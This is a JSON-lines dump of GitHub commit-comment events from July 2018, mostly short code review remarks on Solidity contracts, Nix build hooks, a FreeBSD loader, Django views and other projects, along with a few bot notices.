{"id":"7995582203","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29780851,"position":null,"line":null,"path":null,"commit_id":"e17266cba39a9a4fe68cfcb5ff574472db47fd3e","created_at":"2018-07-20T15:09:22Z","updated_at":"2018-07-20T15:09:22Z","author_association":"NONE","body":"#6599-HVACAirloopUnitarySystem-does-not-honor-continuous-fan-mode-using-multispeed-heating-coil (mjwitte) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-e17266cba39a9a4fe68cfcb5ff574472db47fd3e-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-20T15:09:22Z"}
{"id":"7995585917","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"Srinivas-Sathyanarayanan/blockChainLearnings"},"payload":{"comment":{"id":29780856,"position":33,"line":33,"path":"ProjSplitter/contracts/Splitter.sol","commit_id":"a7e96f8137a04248497b98d2eaf49f59d0639585","created_at":"2018-07-20T15:10:01Z","updated_at":"2018-07-20T15:10:01Z","author_association":"NONE","body":"This `amt` variable brings no benefit."}},"created_at":"2018-07-20T15:10:01Z"}
{"id":"7995585952","type":"CommitCommentEvent","actor":{"login":"richardpkingston"},"repo":{"name":"richardpkingston/richardpkingston.github.io"},"payload":{"comment":{"id":29780857,"position":null,"line":null,"path":null,"commit_id":"2888f8d8286da7e766b035b13e5a9a55918003e5","created_at":"2018-07-20T15:10:02Z","updated_at":"2018-07-20T15:10:02Z","author_association":"OWNER","body":"www.honleycc.com"}},"created_at":"2018-07-20T15:10:02Z"}
{"id":"7995589173","type":"CommitCommentEvent","actor":{"login":"richardpkingston"},"repo":{"name":"richardpkingston/richardpkingston.github.io"},"payload":{"comment":{"id":29780867,"position":null,"line":null,"path":null,"commit_id":"2888f8d8286da7e766b035b13e5a9a55918003e5","created_at":"2018-07-20T15:10:37Z","updated_at":"2018-07-20T15:10:37Z","author_association":"OWNER","body":"www.honleycc.com"}},"created_at":"2018-07-20T15:10:37Z"}
{"id":"7995589601","type":"CommitCommentEvent","actor":{"login":"httpdigest"},"repo":{"name":"Itay2805/Attack"},"payload":{"comment":{"id":29780868,"position":null,"line":null,"path":null,"commit_id":"d25b5d1e774b85235719efb1c76bbad2d2e3b98d","created_at":"2018-07-20T15:10:42Z","updated_at":"2018-07-20T15:10:42Z","author_association":"NONE","body":"It'd also be very nice to know what did not work when you tried joml-android. You probably did not add the necessary repository as mentioned here: https://github.com/JOML-CI/JOML/wiki#gradle-setup-for-android"}},"created_at":"2018-07-20T15:10:42Z"}
{"id":"7995589980","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"Srinivas-Sathyanarayanan/blockChainLearnings"},"payload":{"comment":{"id":29780871,"position":47,"line":47,"path":"ProjSplitter/contracts/Splitter.sol","commit_id":"a7e96f8137a04248497b98d2eaf49f59d0639585","created_at":"2018-07-20T15:10:46Z","updated_at":"2018-07-20T15:10:46Z","author_association":"NONE","body":"Try to DIY for now. Implement a flag that when raised, the contract will be unresponsive."}},"created_at":"2018-07-20T15:10:46Z"}
{"id":"7995595049","type":"CommitCommentEvent","actor":{"login":"royger"},"repo":{"name":"kristapuciitis/freebsd"},"payload":{"comment":{"id":29780883,"position":44,"line":100,"path":"stand/efi/loader/multiboot2.c","commit_id":"928ff99445969a320b50594a76f503df89aba23b","created_at":"2018-07-20T15:11:41Z","updated_at":"2018-07-20T15:11:41Z","author_association":"NONE","body":"Missing space between char and *"}},"created_at":"2018-07-20T15:11:41Z"}
{"id":"7995595091","type":"CommitCommentEvent","actor":{"login":"yanavasileva"},"repo":{"name":"camunda/camunda-bpm-platform"},"payload":{"comment":{"id":29780884,"position":32,"line":1624,"path":"engine/src/test/java/org/camunda/bpm/engine/test/api/task/TaskServiceTest.java","commit_id":"92b1b902d517b562eeafbcb1df9dc7f67a0094a1","created_at":"2018-07-20T15:11:42Z","updated_at":"2018-07-20T15:11:42Z","author_association":"CONTRIBUTOR","body":"missing ClockUtil.setCurrentTime(new Date()); at the end of the test"}},"created_at":"2018-07-20T15:11:42Z"}
{"id":"7995596319","type":"CommitCommentEvent","actor":{"login":"akash0x53"},"repo":{"name":"docker-scripts/dev--LTSP"},"payload":{"comment":{"id":29780886,"position":null,"line":null,"path":null,"commit_id":"00817f237fd6f4fca5242e65dd8d66bb663b584d","created_at":"2018-07-20T15:11:55Z","updated_at":"2018-07-20T15:11:55Z","author_association":"NONE","body":"No no no. This is wrong. You should save output when you run `ltsp-config` at the very first time (on line 39) and use that variable in other places where `lts.conf` file needed. `-o` will create default config and overwrite existing file."}},"created_at":"2018-07-20T15:11:55Z"}
{"id":"7995596432","type":"CommitCommentEvent","actor":{"login":"Snickdx"},"repo":{"name":"uwidcit/programmeEngine"},"payload":{"comment":{"id":29780888,"position":null,"line":null,"path":null,"commit_id":"8cf77cf2eb6c85272b1630f92ea3f83543d8b757","created_at":"2018-07-20T15:11:57Z","updated_at":"2018-07-20T15:11:57Z","author_association":"CONTRIBUTOR","body":"@Qarun-Qadir-Bissoondial  seems like you accepted your older version of index.js instead of my newer one and reverted it. Pay a little more attention to the files affected by the merge."}},"created_at":"2018-07-20T15:11:57Z"}
{"id":"7995597300","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"Srinivas-Sathyanarayanan/blockChainLearnings"},"payload":{"comment":{"id":29780890,"position":5,"line":5,"path":"ProjSplitter/contracts/Splitter.sol","commit_id":"a7e96f8137a04248497b98d2eaf49f59d0639585","created_at":"2018-07-20T15:12:07Z","updated_at":"2018-07-20T15:12:07Z","author_association":"NONE","body":"If this is not clear enough, your function is open to the world. Anyone can create a transaction that targets this function. And this function will just accept it."}},"created_at":"2018-07-20T15:12:07Z"}
{"id":"7995598084","type":"CommitCommentEvent","actor":{"login":"matthewbauer"},"repo":{"name":"matthewbauer/nixpkgs"},"payload":{"comment":{"id":29780894,"position":3,"line":13,"path":"pkgs/build-support/bintools-wrapper/setup-hook.sh","commit_id":"110b5e0b6a8db0008c5698bf6aea986b0af0df6b","created_at":"2018-07-20T15:12:15Z","updated_at":"2018-07-20T15:12:15Z","author_association":"OWNER","body":"I was thinking about that, but I think you can technically do something like ```-lDIR/LIB```. Not sure if that is used anywhere though."}},"created_at":"2018-07-20T15:12:15Z"}
{"id":"7995604260","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"Srinivas-Sathyanarayanan/blockChainLearnings"},"payload":{"comment":{"id":29780902,"position":27,"line":20,"path":"ProjSplitter/contracts/Splitter.sol","commit_id":"3307bd7c8bc54e1ba9a95925789a15e2168f0a54","created_at":"2018-07-20T15:13:24Z","updated_at":"2018-07-20T15:13:24Z","author_association":"NONE","body":"👍  That's a constructor."}},"created_at":"2018-07-20T15:13:24Z"}
{"id":"7995613616","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"Srinivas-Sathyanarayanan/blockChainLearnings"},"payload":{"comment":{"id":29780923,"position":37,"line":32,"path":"ProjSplitter/contracts/Splitter.sol","commit_id":"f361e3fc2409a11e40b3932ecd23a04b01c4d8b3","created_at":"2018-07-20T15:15:05Z","updated_at":"2018-07-20T15:15:05Z","author_association":"NONE","body":"Typically, the event would log the _change_ and not the _state_. So instead of logging `balances[receiverOne]`, you would log `splitAmt`.\r\nAlso don't forget that the owner may have got something too.\r\n"}},"created_at":"2018-07-20T15:15:05Z"}
{"id":"7995613899","type":"CommitCommentEvent","actor":{"login":"micheloosterhof"},"repo":{"name":"micheloosterhof/cowrie"},"payload":{"comment":{"id":29780925,"position":null,"line":null,"path":null,"commit_id":"39a2b3ee8de7f357ed2b5f5a7d0115b39c854caa","created_at":"2018-07-20T15:15:09Z","updated_at":"2018-07-20T15:15:09Z","author_association":"OWNER","body":"Yes, I was checking out the impact of doing this. Not a bad idea."}},"created_at":"2018-07-20T15:15:09Z"}
{"id":"7995615963","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"Srinivas-Sathyanarayanan/blockChainLearnings"},"payload":{"comment":{"id":29780937,"position":21,"line":19,"path":"ProjSplitter/contracts/Splitter.sol","commit_id":"f361e3fc2409a11e40b3932ecd23a04b01c4d8b3","created_at":"2018-07-20T15:15:31Z","updated_at":"2018-07-20T15:15:31Z","author_association":"NONE","body":"As a soft rule, try to keep a single event per \"function\" that changes state."}},"created_at":"2018-07-20T15:15:31Z"}
{"id":"7995618949","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"Srinivas-Sathyanarayanan/blockChainLearnings"},"payload":{"comment":{"id":29780941,"position":21,"line":19,"path":"ProjSplitter/contracts/Splitter.sol","commit_id":"f361e3fc2409a11e40b3932ecd23a04b01c4d8b3","created_at":"2018-07-20T15:16:05Z","updated_at":"2018-07-20T15:16:05Z","author_association":"NONE","body":"I am not sure why you replaced `msg.sender` with `owner`."}},"created_at":"2018-07-20T15:16:05Z"}
{"id":"7995622047","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"Srinivas-Sathyanarayanan/blockChainLearnings"},"payload":{"comment":{"id":29780946,"position":37,"line":47,"path":"ProjSplitter/contracts/Splitter.sol","commit_id":"3307bd7c8bc54e1ba9a95925789a15e2168f0a54","created_at":"2018-07-20T15:16:40Z","updated_at":"2018-07-20T15:16:40Z","author_association":"NONE","body":"Now that you have `bal`, why do you still have `amount` below?"}},"created_at":"2018-07-20T15:16:40Z"}
{"id":"7995629146","type":"CommitCommentEvent","actor":{"login":"dezgeg"},"repo":{"name":"matthewbauer/nixpkgs"},"payload":{"comment":{"id":29780958,"position":3,"line":13,"path":"pkgs/build-support/bintools-wrapper/setup-hook.sh","commit_id":"110b5e0b6a8db0008c5698bf6aea986b0af0df6b","created_at":"2018-07-20T15:17:59Z","updated_at":"2018-07-20T15:17:59Z","author_association":"NONE","body":"Yeah, I checked that gcc does support that. But given that it would look for `libfoo/bar.so` and not `foo/libbar.so` you'd have to be really insane to use such constructs, IMHO."}},"created_at":"2018-07-20T15:17:59Z"}
{"id":"7995631111","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"micahu/splitter"},"payload":{"comment":{"id":29780961,"position":99,"line":57,"path":"contracts/Splitter.sol","commit_id":"e7bf72a4462d74ff70a26166e95ef9a732f0dace","created_at":"2018-07-20T15:18:20Z","updated_at":"2018-07-20T15:18:20Z","author_association":"NONE","body":"Yes, but why not use `balance`. You are duplicating data in memory."}},"created_at":"2018-07-20T15:18:20Z"}
{"id":"7995634984","type":"CommitCommentEvent","actor":{"login":"Mavericktx2"},"repo":{"name":"GoogleContainerTools/skaffold"},"payload":{"comment":{"id":29780964,"position":null,"line":null,"path":null,"commit_id":"b3e73f1af14881bb66e068a4edb4abed135b0b20","created_at":"2018-07-20T15:19:01Z","updated_at":"2018-07-20T15:19:01Z","author_association":"NONE","body":"In doing this all wrong"}},"created_at":"2018-07-20T15:19:01Z"}
{"id":"7995638440","type":"CommitCommentEvent","actor":{"login":"acdha"},"repo":{"name":"ArtemisConsulting/concordia"},"payload":{"comment":{"id":29780968,"position":18,"line":174,"path":"concordia/views.py","commit_id":"c2ffb9ae6360f7a2961b64fdcc42bc35155f3084","created_at":"2018-07-20T15:19:36Z","updated_at":"2018-07-20T15:19:36Z","author_association":"NONE","body":"What is the pass statement doing?"}},"created_at":"2018-07-20T15:19:36Z"}
{"id":"7995638714","type":"CommitCommentEvent","actor":{"login":"emanoelvianna"},"repo":{"name":"ccem-dev/otus-api"},"payload":{"comment":{"id":29780969,"position":21,"line":21,"path":"otus-participant/src/main/java/org/ccem/otus/participant/service/ParticipantService.java","commit_id":"b52a8bd8a1c6d4713cd8519d6017570e69236eae","created_at":"2018-07-20T15:19:39Z","updated_at":"2018-07-20T15:19:39Z","author_association":"MEMBER","body":"Remover linha comentada."}},"created_at":"2018-07-20T15:19:39Z"}
{"id":"7995640783","type":"CommitCommentEvent","actor":{"login":"plusun"},"repo":{"name":"plusun/src"},"payload":{"comment":{"id":29780974,"position":null,"line":null,"path":null,"commit_id":"0d828a78c982fb2289b86ec619896bfda55c29d7","created_at":"2018-07-20T15:20:02Z","updated_at":"2018-07-20T15:20:02Z","author_association":"OWNER","body":"Yes, it is more efficient, thanks for the advice! I've updated the implementation.\r\n\r\nWhat's more, it seems that the first bug has appeared even without any sanitizer. Please try this to reproduce it: https://github.com/plusun/src/tree/gsoc2018/tests/fuzz/regex/libc/regexec/bug\r\nJust make it and you will get a \"main\" binary. Then run it by feeding one bug input file under the same directory. You can also use gdb to figure out why it crashed.\r\n\r\nAnd I want to ask that is there any method to disable the generation of docs in the Makefile? Since every time I use make to build, it doesn't know how to treat *.1 files."}},"created_at":"2018-07-20T15:20:02Z"}
{"id":"7995641489","type":"CommitCommentEvent","actor":{"login":"KentJames"},"repo":{"name":"nithyanandan/EPIC"},"payload":{"comment":{"id":29780976,"position":null,"line":null,"path":null,"commit_id":"26ece00054952e44837043125590263504ccb0e0","created_at":"2018-07-20T15:20:10Z","updated_at":"2018-07-20T15:20:10Z","author_association":"COLLABORATOR","body":"@jaycedowell In lines 482-486, what exactly do the axes of this array correspond to? I am trying to do the auto-correlations in lock-step with the images and I am trying to piece together your logic as to how that array is structured. \r\n\r\nIt looks like you are doing something clever where you reshape the input data and grid so that you can combine multiple grids in a single matrix multiplication, followed by a reshape. \r\n\r\nI am basically trying to do something similar to get the autocorrs in, but just wanted to clarify your logic.\r\n\r\n"}},"created_at":"2018-07-20T15:20:10Z"}
{"id":"7995643746","type":"CommitCommentEvent","actor":{"login":"dgageot"},"repo":{"name":"GoogleContainerTools/skaffold"},"payload":{"comment":{"id":29780982,"position":null,"line":null,"path":null,"commit_id":"b3e73f1af14881bb66e068a4edb4abed135b0b20","created_at":"2018-07-20T15:20:34Z","updated_at":"2018-07-20T15:20:34Z","author_association":"MEMBER","body":"??"}},"created_at":"2018-07-20T15:20:34Z"}
{"id":"7995644624","type":"CommitCommentEvent","actor":{"login":"dearzky"},"repo":{"name":"kadmil/testWebApp"},"payload":{"comment":{"id":29780983,"position":3,"line":20,"path":"index.html","commit_id":"43b8640f3d45893942ac3ec9db70b0dfcfcf7eaf","created_at":"2018-07-20T15:20:44Z","updated_at":"2018-07-20T15:20:44Z","author_association":"NONE","body":"Привет от https://github.com/dearzky"}},"created_at":"2018-07-20T15:20:44Z"}
{"id":"7995645687","type":"CommitCommentEvent","actor":{"login":"plusun"},"repo":{"name":"plusun/src"},"payload":{"comment":{"id":29780985,"position":null,"line":null,"path":null,"commit_id":"0d828a78c982fb2289b86ec619896bfda55c29d7","created_at":"2018-07-20T15:20:55Z","updated_at":"2018-07-20T15:20:55Z","author_association":"OWNER","body":"Yes, it is more efficient, thanks for the advice! I've updated the implementation.\r\n\r\nWhat's more, it seems that the first bug has appeared even without any sanitizer. Please try this to reproduce it: https://github.com/plusun/src/tree/gsoc2018/tests/fuzz/regex/libc/regexec/bug\r\nJust make it and you will get a \"main\" binary. Then run it by feeding one bug input file under the same directory. You can also use gdb to figure out why it crashed.\r\n\r\nAnd I want to ask that is there any method to disable the generation of docs in the Makefile, since every time I use make to build, it doesn't know how to treat *.1 files?"}},"created_at":"2018-07-20T15:20:55Z"}
{"id":"7995646418","type":"CommitCommentEvent","actor":{"login":"acdha"},"repo":{"name":"ArtemisConsulting/concordia"},"payload":{"comment":{"id":29780987,"position":null,"line":null,"path":null,"commit_id":"c2ffb9ae6360f7a2961b64fdcc42bc35155f3084","created_at":"2018-07-20T15:21:03Z","updated_at":"2018-07-20T15:21:03Z","author_association":"NONE","body":"Is there corresponding code to prevent anonymous users’ tags from being saved if the front-end logic fails?"}},"created_at":"2018-07-20T15:21:03Z"}
{"id":"7995648539","type":"CommitCommentEvent","actor":{"login":"dearzky"},"repo":{"name":"kadmil/testWebApp"},"payload":{"comment":{"id":29780990,"position":null,"line":null,"path":null,"commit_id":"43b8640f3d45893942ac3ec9db70b0dfcfcf7eaf","created_at":"2018-07-20T15:21:26Z","updated_at":"2018-07-20T15:21:26Z","author_association":"NONE","body":"аываываываыва"}},"created_at":"2018-07-20T15:21:26Z"}
{"id":"7995649015","type":"CommitCommentEvent","actor":{"login":"MemduhG"},"repo":{"name":"apertium/apertium-uig-tur"},"payload":{"comment":{"id":29780992,"position":5,"line":1234,"path":"apertium-uig-tur.uig-tur.dix","commit_id":"eb68e7196cfc4cf42ee40e5356841e68df755823","created_at":"2018-07-20T15:21:30Z","updated_at":"2018-07-20T15:21:30Z","author_association":"COLLABORATOR","body":"Hmm what is this?"}},"created_at":"2018-07-20T15:21:30Z"}
{"id":"7995650501","type":"CommitCommentEvent","actor":{"login":"loriab"},"repo":{"name":"psi4/psi4"},"payload":{"comment":{"id":29780995,"position":4,"line":51,"path":"doc/sphinxman/source/dftd3.rst","commit_id":"cbcb1554cb029a9f13618ec4cc8ebda3813df57b","created_at":"2018-07-20T15:21:47Z","updated_at":"2018-07-20T15:21:47Z","author_association":"MEMBER","body":"np. we all serve the Sphinx. I am only better placed to anticipate its anger."}},"created_at":"2018-07-20T15:21:47Z"}
{"id":"7995654919","type":"CommitCommentEvent","actor":{"login":"dezgeg"},"repo":{"name":"matthewbauer/nixpkgs"},"payload":{"comment":{"id":29781002,"position":3,"line":13,"path":"pkgs/build-support/bintools-wrapper/setup-hook.sh","commit_id":"110b5e0b6a8db0008c5698bf6aea986b0af0df6b","created_at":"2018-07-20T15:22:34Z","updated_at":"2018-07-20T15:22:34Z","author_association":"NONE","body":"`nix-locate --regex '^/lib/lib[^/]*/.*\\.(so|a)$'` does seem to give some hits though, but from a quick glance many of them seem like runtime-loaded plugins or something."}},"created_at":"2018-07-20T15:22:34Z"}
{"id":"7995659034","type":"CommitCommentEvent","actor":{"login":"DominicHolmes"},"repo":{"name":"holmesal/react-native-slider"},"payload":{"comment":{"id":29781009,"position":null,"line":null,"path":null,"commit_id":"5bf33404a2217c43c055d45f66372b898fc4fcd8","created_at":"2018-07-20T15:23:18Z","updated_at":"2018-07-20T15:23:18Z","author_association":"NONE","body":"cool"}},"created_at":"2018-07-20T15:23:18Z"}
{"id":"7995662933","type":"CommitCommentEvent","actor":{"login":"Galarzaa90"},"repo":{"name":"Galarzaa90/NabBot"},"payload":{"comment":{"id":29781013,"position":null,"line":null,"path":null,"commit_id":"258fd21d5c8d2c346410b39f78ad38a688190add","created_at":"2018-07-20T15:24:02Z","updated_at":"2018-07-20T15:24:02Z","author_association":"OWNER","body":"@Nezune I think you a word there."}},"created_at":"2018-07-20T15:24:02Z"}
{"id":"7995664075","type":"CommitCommentEvent","actor":{"login":"natefaubion"},"repo":{"name":"colinwahl/purescript"},"payload":{"comment":{"id":29781016,"position":14,"line":124,"path":"src/Language/PureScript/CoreImp/Optimizer/MagicDo.hs","commit_id":"bfc908f9e09b8131e6d34161716f299e0dc2aac1","created_at":"2018-07-20T15:24:15Z","updated_at":"2018-07-20T15:24:15Z","author_association":"NONE","body":"I think you want to flip the ref and func. The ref is no longer the first argument."}},"created_at":"2018-07-20T15:24:15Z"}
{"id":"7995665902","type":"CommitCommentEvent","actor":{"login":"grant2258"},"repo":{"name":"libretro/mame2003-plus-libretro"},"payload":{"comment":{"id":29781018,"position":null,"line":null,"path":null,"commit_id":"d4c2b483a9def56c45c56f42091f36171636bd76","created_at":"2018-07-20T15:24:34Z","updated_at":"2018-07-20T15:24:34Z","author_association":"CONTRIBUTOR","body":"@twinaphex looks like libflac is having problems with msvc2010 you can revert the patches for the moonwalker liblac  ost and we cab just use the normal wavs if you like. I wont be converting the libflac to c90 "}},"created_at":"2018-07-20T15:24:34Z"}
{"id":"7995693443","type":"CommitCommentEvent","actor":{"login":"dashohoxha"},"repo":{"name":"docker-scripts/dev--LTSP"},"payload":{"comment":{"id":29781084,"position":null,"line":null,"path":null,"commit_id":"00817f237fd6f4fca5242e65dd8d66bb663b584d","created_at":"2018-07-20T15:29:18Z","updated_at":"2018-07-20T15:29:18Z","author_association":"MEMBER","body":"> You should save output when you run ltsp-config at the very first time (on line 39) and use that variable in other places where lts.conf file needed\r\n\r\nThis is the best approach.\r\nAlternatively you can get the architecture of the machine (for example with `uname -m`) and then modify the appropriate config file (either `i386` or `amd64`)."}},"created_at":"2018-07-20T15:29:18Z"}
{"id":"7995694953","type":"CommitCommentEvent","actor":{"login":"AndrewJCallow"},"repo":{"name":"AndrewJCallow/Splitter"},"payload":{"comment":{"id":29781085,"position":5,"line":28,"path":"contracts/Splitter.sol","commit_id":"b2fdff5bdfc8408b8037a15bdf8dd2c567f92d45","created_at":"2018-07-20T15:29:34Z","updated_at":"2018-07-20T15:29:34Z","author_association":"OWNER","body":"I made the base class owner private and provided the accessor so that derived classes couldn't adjust it (Rob's idea so they couldn't adjust it).\r\n\r\nThe owner is set as msg.sender in the base class and I have access to msg.sender here. Would it be acceptable given this is a derived class of Owned to compare against msg.sender?\r\n\r\nIf I'm protecting the variable owner from being set I can't make it internal (and so access it directly).\r\n\r\nAt worst, I could call getOwner() once and cache the result for the other three comparisons.\r\n\r\nI think use msg.sender is the correct answer. Is it? In any case, thank you for reminding me that every function costs!"}},"created_at":"2018-07-20T15:29:34Z"}
{"id":"7995695648","type":"CommitCommentEvent","actor":{"login":"amatiu"},"repo":{"name":"amatiu/stady004"},"payload":{"comment":{"id":29781089,"position":null,"line":null,"path":null,"commit_id":"57e1adc2630ed827097e0f94f8c789416f7b0486","created_at":"2018-07-20T15:29:42Z","updated_at":"2018-07-20T15:29:42Z","author_association":"OWNER","body":"https://github.com/amatiu/stady004/commit/57e1adc2630ed827097e0f94f8c789416f7b0486"}},"created_at":"2018-07-20T15:29:42Z"}
{"id":"7995697857","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/pyjnius-feedstock"},"payload":{"comment":{"id":29781096,"position":null,"line":null,"path":null,"commit_id":"9ef034b574bf30759a931c93292fd5857f243edf","created_at":"2018-07-20T15:30:08Z","updated_at":"2018-07-20T15:30:08Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @hanslovsky was added to conda-forge. Welcome to conda-forge!\n  Go to https://github.com/orgs/conda-forge/invitation see your invitation.\n\nYou should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-20T15:30:08Z"}
{"id":"7995700005","type":"CommitCommentEvent","actor":{"login":"Dockter"},"repo":{"name":"AlmuraDev/Almura"},"payload":{"comment":{"id":29781101,"position":26,"line":92,"path":"src/main/java/com/almuradev/almura/feature/death/DeathHandler.java","commit_id":"6cd05b0e96d8ef45bb287f97d6f0efba1e25a657","created_at":"2018-07-20T15:30:30Z","updated_at":"2018-07-20T15:30:30Z","author_association":"MEMBER","body":"This isn't completed, thus the TODO."}},"created_at":"2018-07-20T15:30:30Z"}
{"id":"7995700085","type":"CommitCommentEvent","actor":{"login":"Zidane"},"repo":{"name":"AlmuraDev/Almura"},"payload":{"comment":{"id":29781102,"position":50,"line":112,"path":"src/main/java/com/almuradev/almura/feature/complex/block/coinexchange/CoinMachine.java","commit_id":"573ce90052fe2429ba34533e5607ed26f3f27eb2","created_at":"2018-07-20T15:30:31Z","updated_at":"2018-07-20T15:30:31Z","author_association":"MEMBER","body":"@Dockter Not sure if this will ever affect Almura but the Economy API does multiple currenices so if you ever switch Econ plugins, it may not just be coins/etc.\r\n\r\nSomething to keep in mind."}},"created_at":"2018-07-20T15:30:31Z"}
{"id":"7995706888","type":"CommitCommentEvent","actor":{"login":"craneworks"},"repo":{"name":"micheloosterhof/cowrie"},"payload":{"comment":{"id":29781117,"position":null,"line":null,"path":null,"commit_id":"39a2b3ee8de7f357ed2b5f5a7d0115b39c854caa","created_at":"2018-07-20T15:31:46Z","updated_at":"2018-07-20T15:31:46Z","author_association":"CONTRIBUTOR","body":"I would consider moving everything which belongs to the code inside a app directory.\r\nEven binary blobs etc. If you want to split then the actual code from stuff like this you could do this inside this directory so you would have `app/src`, `app/statics`, etc."}},"created_at":"2018-07-20T15:31:46Z"}
{"id":"7995713346","type":"CommitCommentEvent","actor":{"login":"nmiles2718"},"repo":{"name":"mdlpstsci/hstcal"},"payload":{"comment":{"id":29781132,"position":null,"line":null,"path":null,"commit_id":"ac01de955be7a54457dd0731e382b13e06b1c323","created_at":"2018-07-20T15:33:02Z","updated_at":"2018-07-20T15:33:02Z","author_association":"NONE","body":"Hey @mdlpstsci, everything here looks great. The only changes that I find are in the value of the computed mean dark current that is reported in the header, but the changes are at the level of a part in million (1e-6) and that is expected. Feel free to proceed from the process of including these changes into 2018.3"}},"created_at":"2018-07-20T15:33:02Z"}
{"id":"7995716115","type":"CommitCommentEvent","actor":{"login":"BharathiBagavan"},"repo":{"name":"BharathiBagavan/NewProject"},"payload":{"comment":{"id":29781137,"position":8,"line":8,"path":"learningjava/src/samplejava/Understandarray.java","commit_id":"cc6270d42e2846e0977c3b83fa207b456a248702","created_at":"2018-07-20T15:33:32Z","updated_at":"2018-07-20T15:33:32Z","author_association":"OWNER","body":"hello"}},"created_at":"2018-07-20T15:33:32Z"}
{"id":"7995718629","type":"CommitCommentEvent","actor":{"login":"markwkidd"},"repo":{"name":"libretro/mame2003-plus-libretro"},"payload":{"comment":{"id":29781142,"position":null,"line":null,"path":null,"commit_id":"d4c2b483a9def56c45c56f42091f36171636bd76","created_at":"2018-07-20T15:34:01Z","updated_at":"2018-07-20T15:34:01Z","author_association":"COLLABORATOR","body":"@grant2258 it looks like maybe someone already 'libretro-ized\" libflac here https://github.com/libretro/libretro-deps/tree/master/libFLAC\r\n\r\nI don't know what that is, but the repo description says \"Third-party dependencies, pre-modified for ready-made use by libretro cores. Uses libretro-common where needed.\""}},"created_at":"2018-07-20T15:34:01Z"}
{"id":"7995719310","type":"CommitCommentEvent","actor":{"login":"Dockter"},"repo":{"name":"AlmuraDev/Almura"},"payload":{"comment":{"id":29781145,"position":50,"line":112,"path":"src/main/java/com/almuradev/almura/feature/complex/block/coinexchange/CoinMachine.java","commit_id":"573ce90052fe2429ba34533e5607ed26f3f27eb2","created_at":"2018-07-20T15:34:09Z","updated_at":"2018-07-20T15:34:09Z","author_association":"MEMBER","body":"Internal discussions are ongoing with this matter.  Christina brought up a possible issue down the road."}},"created_at":"2018-07-20T15:34:09Z"}
{"id":"7995726041","type":"CommitCommentEvent","actor":{"login":"birkenfeld"},"repo":{"name":"birkenfeld/stm32-eth"},"payload":{"comment":{"id":29781163,"position":null,"line":null,"path":null,"commit_id":"998b7961a5911276d6c0387b6752e3da865fe5cd","created_at":"2018-07-20T15:35:25Z","updated_at":"2018-07-20T15:35:25Z","author_association":"OWNER","body":"heh, although this is technically a fork I've used it for my own stuff only. I'll have to clean up a lot to get PRs going :)"}},"created_at":"2018-07-20T15:35:25Z"}
{"id":"7995726794","type":"CommitCommentEvent","actor":{"login":"AndrewJCallow"},"repo":{"name":"AndrewJCallow/Splitter"},"payload":{"comment":{"id":29781164,"position":14,"line":41,"path":"contracts/Splitter.sol","commit_id":"b2fdff5bdfc8408b8037a15bdf8dd2c567f92d45","created_at":"2018-07-20T15:35:34Z","updated_at":"2018-07-20T15:35:34Z","author_association":"OWNER","body":"You're right, who cares? It's not like I'm setting anything and it'll just return 0 if we query a mapping with this value."}},"created_at":"2018-07-20T15:35:34Z"}
{"id":"7995728698","type":"CommitCommentEvent","actor":{"login":"acdha"},"repo":{"name":"ArtemisConsulting/concordia"},"payload":{"comment":{"id":29781172,"position":91,"line":193,"path":"concordia/views.py","commit_id":"016dec62503c1db4f9d8997f9d06ddf551f98610","created_at":"2018-07-20T15:35:57Z","updated_at":"2018-07-20T15:35:57Z","author_association":"NONE","body":"Not a huge deal but I generally prefer moving things like this to a separate variable any time you’re paying the lookup cost multiple times.\r\n\r\nAs a design question, do we support multiple POSTed values using getlist()? The design now would prevent use of a tag name with a comma and that seems like a problem if we ever want to add e.g. a contributor or place name as a tag. "}},"created_at":"2018-07-20T15:35:57Z"}
{"id":"7995730900","type":"CommitCommentEvent","actor":{"login":"kristapuciitis"},"repo":{"name":"kristapuciitis/freebsd"},"payload":{"comment":{"id":29781178,"position":7,"line":63,"path":"stand/efi/loader/multiboot2.c","commit_id":"928ff99445969a320b50594a76f503df89aba23b","created_at":"2018-07-20T15:36:21Z","updated_at":"2018-07-20T15:36:21Z","author_association":"OWNER","body":"Multiboot2 specification says these addresses should be 4 bytes long, so I want them converted from vm_addr_t to 32 bit unsigned integer."}},"created_at":"2018-07-20T15:36:21Z"}
{"id":"7995731240","type":"CommitCommentEvent","actor":{"login":"somejavadev"},"repo":{"name":"spring-projects/spring-vault"},"payload":{"comment":{"id":29781179,"position":null,"line":null,"path":null,"commit_id":"814f42afc268b2127cb4bab2e3dc975f94ad52a0","created_at":"2018-07-20T15:36:25Z","updated_at":"2018-07-20T15:36:25Z","author_association":"NONE","body":"Hi, thank you for this change, any idea when this will be released in a stable version? I see the current 2.0.1.RELEASE does not yet contain this."}},"created_at":"2018-07-20T15:36:25Z"}
